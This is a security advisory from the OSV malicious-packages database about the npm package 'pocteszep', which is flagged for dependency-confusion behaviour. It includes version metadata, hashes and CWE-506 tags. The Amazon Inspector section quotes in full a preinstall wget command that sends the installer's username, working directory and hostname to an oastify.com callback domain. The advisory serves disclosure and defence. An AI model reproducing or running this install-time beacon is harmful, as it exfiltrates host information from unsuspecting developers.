MAL-2026-5544

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pocteszep/MAL-2026-5544.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5544
Published
2026-06-11T01:42:15Z
Modified
2026-06-11T04:01:29.235381950Z
Summary
Malicious code in pocteszep (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (e13c609971d69e4699c85f451f163c7ab60ebb775171211fbd20d880b0ef2a2d)

The package's npm preinstall lifecycle script runs wget --quiet "http://78dngdm3dhrrj8zgfm4es9m8bzhq5jt8.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)" (package.json line 8). On npm install, before any code review, the installer's username, current working directory, and hostname are sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain — a typical out-of-band exfiltration channel used in dependency-confusion attacks. The package description self-identifies as a 'Simple PoC package for testing for dependency confusion vulnerabilities,' and the package contains no legitimate functionality beyond the lifecycle beacon. Any installer pulling this package via name-collision with an internal dependency leaks host identity to the attacker.

Source: ossf-package-analysis (1724503cde62bd3c17ba606fd752f088dfb2b1c41ae612ef5074f93e9896ee00)

The OpenSSF Package Analysis project identified 'pocteszep' @ 1.0.2 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.

  • The package executes one or more commands associated with malicious behavior.

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-11T02:10:39Z",
            "sha256": "0928ae3dd121de41479d98b831bdff705eb1e0e5960a60863c22fc844749fdae",
            "versions": [
                "1.0.5"
            ],
            "import_time": "2026-06-11T02:24:28.772851114Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-005379"
        },
        {
            "source": "amazon-inspector",
            "sha256": "49e809bf95413ac0d2235c8a4abf33b3b2121af7e3b8fc2393e077c04ae28fdc",
            "import_time": "2026-06-11T02:24:27.503226582Z",
            "modified_time": "2026-06-11T01:42:16Z",
            "id": "IN-MAL-2026-005356",
            "versions": [
                "1.0.1"
            ]
        },
        {
            "source": "amazon-inspector",
            "sha256": "a469c97969991b78ee0e28cc8e4a43d14750da0d4e3d4519f6e21263c9143a8f",
            "import_time": "2026-06-11T02:24:28.811952768Z",
            "modified_time": "2026-06-11T02:10:39Z",
            "id": "IN-MAL-2026-005380",
            "versions": [
                "1.0.5"
            ]
        },
        {
            "source": "amazon-inspector",
            "sha256": "c146870dfd2759e9e7b37a0c37783c40dbc35ebbf4e2145c1763dacc0b1d9e9f",
            "import_time": "2026-06-11T02:24:28.710852245Z",
            "modified_time": "2026-06-11T02:09:54Z",
            "id": "IN-MAL-2026-005378",
            "versions": [
                "1.0.4"
            ]
        },
        {
            "import_time": "2026-06-11T02:24:28.108549031Z",
            "sha256": "c559e1ff2e96350c1eb7bc1c091c250b5860a7712fa7b99bbfb8762910190af7",
            "modified_time": "2026-06-11T01:52:26Z",
            "versions": [
                "1.0.0"
            ],
            "id": "IN-MAL-2026-005366",
            "source": "amazon-inspector"
        },
        {
            "source": "amazon-inspector",
            "sha256": "e13c609971d69e4699c85f451f163c7ab60ebb775171211fbd20d880b0ef2a2d",
            "import_time": "2026-06-11T02:24:28.868274594Z",
            "modified_time": "2026-06-11T02:11:12Z",
            "id": "IN-MAL-2026-005381",
            "versions": [
                "1.0.2"
            ]
        },
        {
            "versions": [
                "1.0.1"
            ],
            "sha256": "f0ba0d9e403509d779b0247843e7f8994a4caae4b7fe43f41192ff708a07d4cf",
            "import_time": "2026-06-11T02:24:27.429865006Z",
            "modified_time": "2026-06-11T01:42:15Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-005355"
        },
        {
            "sha256": "1724503cde62bd3c17ba606fd752f088dfb2b1c41ae612ef5074f93e9896ee00",
            "versions": [
                "1.0.2"
            ],
            "import_time": "2026-06-11T02:24:24.877314502Z",
            "source": "ossf-package-analysis",
            "modified_time": "2026-06-11T01:50:49Z"
        },
        {
            "modified_time": "2026-06-11T01:52:26Z",
            "sha256": "384556848b90af0dc3c06aef498f7c87a97a47c2491454a572ac1a79b197bd14",
            "versions": [
                "1.0.0"
            ],
            "import_time": "2026-06-11T02:24:28.151205845Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-005367"
        },
        {
            "versions": [
                "1.1.1"
            ],
            "sha256": "6c17d0010de4934b20768fdda3f2a6001bfadb3f0e5641a089bd76e40d76a545",
            "import_time": "2026-06-11T03:48:44.440462781Z",
            "modified_time": "2026-06-11T02:47:53Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-005383"
        },
        {
            "source": "amazon-inspector",
            "sha256": "818829f44b80e58e20516cb4ebb5945e3fe8ab8d1118b23224c0f9b116fa5e16",
            "import_time": "2026-06-11T03:48:44.588143806Z",
            "modified_time": "2026-06-11T02:47:57Z",
            "id": "IN-MAL-2026-005384",
            "versions": [
                "1.0.8"
            ]
        },
        {
            "id": "IN-MAL-2026-005382",
            "sha256": "8744fc71275199a30d2b5559e2f3013e057e4ae859cce0bba676bfd0a9da6e72",
            "modified_time": "2026-06-11T02:47:53Z",
            "versions": [
                "1.1.1"
            ],
            "source": "amazon-inspector",
            "import_time": "2026-06-11T03:48:44.343856533Z"
        },
        {
            "sha256": "f84a31af681abb09ee482c9bc1ed642077c36f2e92d1d62325d66a6ca2aabded",
            "import_time": "2026-06-11T03:48:40.164681824Z",
            "modified_time": "2026-06-11T02:30:41Z",
            "source": "ossf-package-analysis",
            "versions": [
                "1.1.1"
            ]
        }
    ]
}
References
Credits

Affected packages

npm / pocteszep

Package

Affected ranges

Affected versions

1.*
1.0.0
1.0.1
1.0.2
1.0.4
1.0.5
1.0.8
1.1.1

Database specific

cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]
indicators
{
    "package_integrity": [
        {
            "filename": "pocteszep-1.0.5.tgz",
            "hashes": {
                "sha1": "9121f340ed270ac453b4249520bb526d0b5f2e6b",
                "sha512_sri": "sha512-QyfT9wrpsBiF3vl6KdmKTaXfTm4AOn5h9vv33pYZFjpCG5xbCgO5LHFwRqpiX8X8ASVONS3ie7K9/LRXmea3YA=="
            }
        }
    ],
    "evidence_files": [
        {
            "tlsh": "ae01cb24a026e9733dc54df7207c0357ae21bed74242ac1cbaf3110c121d9a620b8215",
            "sha256": "f14b2bd3158932ef9add6c786b948b952c16358e84df3930f467d9faba5bf2ca",
            "path": "package.json"
        }
    ],
    "domains": [
        "z11f95fv69kjc0s88ex6l1f04raiyamz.oastify.com"
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/pocteszep/MAL-2026-5544.json"